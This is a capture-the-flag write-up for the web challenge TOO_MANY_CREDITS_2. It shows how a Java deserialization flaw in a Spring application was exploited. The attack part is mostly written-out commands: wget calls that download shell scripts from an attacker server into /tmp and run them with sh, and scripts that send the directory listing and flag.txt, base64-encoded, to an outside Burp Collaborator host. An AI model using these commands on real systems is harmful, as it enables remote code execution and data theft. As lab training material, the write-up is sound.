Tags: spring java-serialization rce java
# ▼▼▼ TOO_MANY_CREDITS_2 (Web: 432pts, 71/661 = 10.7%) ▼▼▼
This writeup is written by [**@kazkiti_ctf**](https://twitter.com/kazkiti_ctf)
---
## 【Aim for RCE with Java serialization】
Using the BurpSuite Extender **Java Deserialization Scanner**
(Reference) `https://portswigger.net/bappstore/228336544ebe4e68824b5146dbbd93ae`
↓
The scanner identifies the endpoint as vulnerable to `Spring serialization`, i.e. a Spring-based deserialization gadget chain
---
## 【Trial and error】
Exploit the `Spring` chain with the BurpSuite Extender, using `wget` callbacks to Burp Collaborator to observe the result (○ = callback as intended, × = no callback, △ = callback arrived but the payload was passed through literally)
↓
```
○Spring2 "wget http://x97ckfooqryax6z8mpno9n9ryi4es3.burpcollaborator.net" ⇒GET /
×Spring2 "wget http://x97ckfooqryax6z8mpno9n9ryi4es3.burpcollaborator.net --user-agent test" ⇒ No access
△Spring2 "wget http://x97ckfooqryax6z8mpno9n9ryi4es3.burpcollaborator.net/`echo 'test'`" ⇒GET /`echo
△Spring2 "wget http://x97ckfooqryax6z8mpno9n9ryi4es3.burpcollaborator.net/`echo test`" ⇒GET /`echo
△Spring2 "wget http://x97ckfooqryax6z8mpno9n9ryi4es3.burpcollaborator.net/`id`" ⇒GET /`id`
※Backquotes are treated as literal characters
△Spring2 "wget http://x97ckfooqryax6z8mpno9n9ryi4es3.burpcollaborator.net/$(id)" ⇒GET /$(id)
※$(id) is treated as literal characters
△Spring2 "wget http://x97ckfooqryax6z8mpno9n9ryi4es3.burpcollaborator.net/|id" ⇒GET /|id
※| is treated as a literal character
×Spring2 "sleep 10;wget http://x97ckfooqryax6z8mpno9n9ryi4es3.burpcollaborator.net/sleep" ⇒ No access
△Spring2 "wget http://x97ckfooqryax6z8mpno9n9ryi4es3.burpcollaborator.net/sleep;sleep 10" ⇒GET /sleep;sleep
※; is treated as a literal character. The command is terminated at the first `space`.
```
↓
Some characters seem to be unusable: shell metacharacters (backquotes, `$()`, `|`, `;`) are passed through literally and the command is cut at the first space, so the command appears to be executed directly rather than through a shell.
---
## 【Finally】
Finally, I downloaded a shell script to the server with `wget` and executed it with `sh`
↓
```
○Spring2 "wget -P /tmp/ http://my_server/kaz.sh"
○Spring2 "sh /tmp/kaz.sh"
```
---
## 【exploit】
Create **the following file**, host it on **my_server**, and download it into the writable `/tmp/` folder
↓
`kaz5.sh`
```
#!/bin/bash
wget http://ih3xs0w9yc6v5r7tuav9h8hc63c20r.burpcollaborator.net/`ls|base64`
```
↓
Download the file with `wget` into the `/tmp/` folder
```
Spring2 "wget -P /tmp/ http://my_server/kaz5.sh"
```
---
Execute the file
```
Spring2 "sh /tmp/kaz5.sh"
```
↓ The callback arrives
```
GET /YmluCmZsYWcudHh0CmxpYgo= HTTP/1.1
Host: ih3xs0w9yc6v5r7tuav9h8hc63c20r.burpcollaborator.net
```
↓
`YmluCmZsYWcudHh0CmxpYgo=`
↓ base64 decode
```
bin
flag.txt
lib
```
---
## 【Get flag】
`kaz10.sh`
```
#!/bin/bash
wget http://ih3xs0w9yc6v5r7tuav9h8hc63c20r.burpcollaborator.net/`cat flag.txt|base64`
```
↓
```
Spring2 "wget -P /tmp/ http://my_server/kaz10.sh"
Spring2 "sh /tmp/kaz10.sh"
```
↓ The callback arrives
```
GET /Z2lnZW17ZGEkaF8zXzFzX0FfbDFmM3NlTmR9Cg== HTTP/1.1
Host: ih3xs0w9yc6v5r7tuav9h8hc63c20r.burpcollaborator.net
```
↓
`Z2lnZW17ZGEkaF8zXzFzX0FfbDFmM3NlTmR9Cg==`
↓ base64 decode
`gigem{da$h_3_1s_A_l1f3seNd}`